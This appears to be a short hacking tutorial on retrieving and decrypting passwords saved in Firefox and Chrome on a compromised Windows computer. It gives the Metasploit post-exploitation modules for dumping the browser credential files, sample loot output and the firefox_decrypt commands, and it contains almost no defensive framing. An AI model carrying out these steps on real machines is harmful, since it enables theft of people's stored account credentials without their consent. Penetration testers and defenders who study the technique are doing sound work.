How To Retrieve & Decrypt Stored Passwords in Firefox & Chrome Remotely

Retrieving stored passwords in web browsers like Mozilla Firefox and Google Chrome is a part of the post-exploitation methodology. Attackers having backdoor access to a compromised computer can easily dump and decrypt stored credentials in web browsers.

Dumping Stored Mozilla Firefox Passwords

Mozilla Firefox built-in password manager stores encrypted credentials in “logins.json”. Credentials are stored in logins.json are encrypted with a key that is stored in the “key4.db” file. Both of these files are located in a certain Windows directory.

%LocalAppData%\Mozilla\Firefox\Profiles\randomString.Default\logins.json

There’s an MSF module which we’ll use to dump Firefox stored passwords on a compromised computer.

Module: firefox_creds

run post/multi/gather/firefox_creds

firefox_creds

[+] Downloaded cert9.db: /root/.msf4/loot/20200927050238_default_10.10.78.147_ff.ljfn812a.cert_254315.bin
[+] Downloaded cookies.sqlite: /root/.msf4/loot/20200927050241_default_10.10.78.147_ff.ljfn812a.cook_800633.bin
[+] Downloaded key4.db: /root/.msf4/loot/20200927050253_default_10.10.78.147_ff.ljfn812a.key4_784345.bin
[+] Downloaded logins.json: /root/.msf4/loot/20200927050257_default_10.10.78.147_ff.ljfn812a.logi_176246.bin

This module has downloaded 4 files for us but you can do it download them manually.

These files have been renamed to .bin just rename them to their original extension.

As you know the credentials are encrypted so now we have to decrypt it.

Decrypting Stored Passwords in Mozilla Firefox

Download firefox_decrypt to your local machine and run the script.

git clone https://github.com/unode/firefox_decrypt.git

There’s a manual on the GitHub repo you can follow. let’s decrypt our credential.

python firefox_decrypt.py /root/.msf4/loot

And there you go!

Dumping Stored Google Chrome Passwords

Google Chrome utilizes a Windows function called CryptProtectData which is used to encrypt passwords that are stored on a computer with the randomly generated keys. The database can be found in the below directory.

%LocalAppData%\Google\Chrome\User Data\Default\Login Data

There’s a Metasploit module available to dump stored credentials from the chrome browser.

Module: enum_chrome

run post/windows/gather/enum_chrome

Decrypting Stored Passwords in Google Chrome

When using the Metasploit module to retrieve credentials it will dump .txt files containing passwords that will contain a “Decrypted Data” column to display decrypted passwords found in the chrome browser.

Back to top button
Close